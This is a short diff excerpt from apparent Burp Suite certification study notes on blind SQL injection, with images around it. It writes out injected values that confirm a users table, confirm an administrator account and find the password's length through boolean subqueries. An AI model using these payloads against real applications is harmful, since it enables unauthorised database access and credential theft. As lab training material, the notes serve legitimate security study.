madslaz/Burp-Suite-Certified-Practitioner/SQL-Injection.md

 ![image](https://github.com/madslaz/Burp-Suite-Certified-Practitioner/assets/52518274/4245f3e7-f716-4f97-afb3-3ab9a26ecd6f)

 2. We can then verify that a table called users exists with `0s7Sc0dx14D3iJ8x' AND (SELECT 'whatever' from users LIMIT 1)='whatever` Now, let's verify that administrator exists with `0s7Sc0dx14D3iJ8x' AND (SELECT 'whatever' from users WHERE username='administrator')='whatever`.
-3. We can figure out the length by inserting an AND LENGTH clause, `0s7Sc0dx14D3iJ8x' AND (SELECT 'whatever' from users WHERE username='administrator' AND LENGTH(password)=20)='whatever`.
+3. We can figure out the length by inserting an AND LENGTH clause, `0s7Sc0dx14D3iJ8x' AND (SELECT 'whatever' FROM users WHERE username='administrator' AND LENGTH(password)=20)='whatever`.
 We found it was 20 after iterating through >s.

 ![image](https://github.com/madslaz/Burp-Suite-Certified-Practitioner/assets/52518274/f11d5925-f4dc-46e4-97b9-29c79c20a829)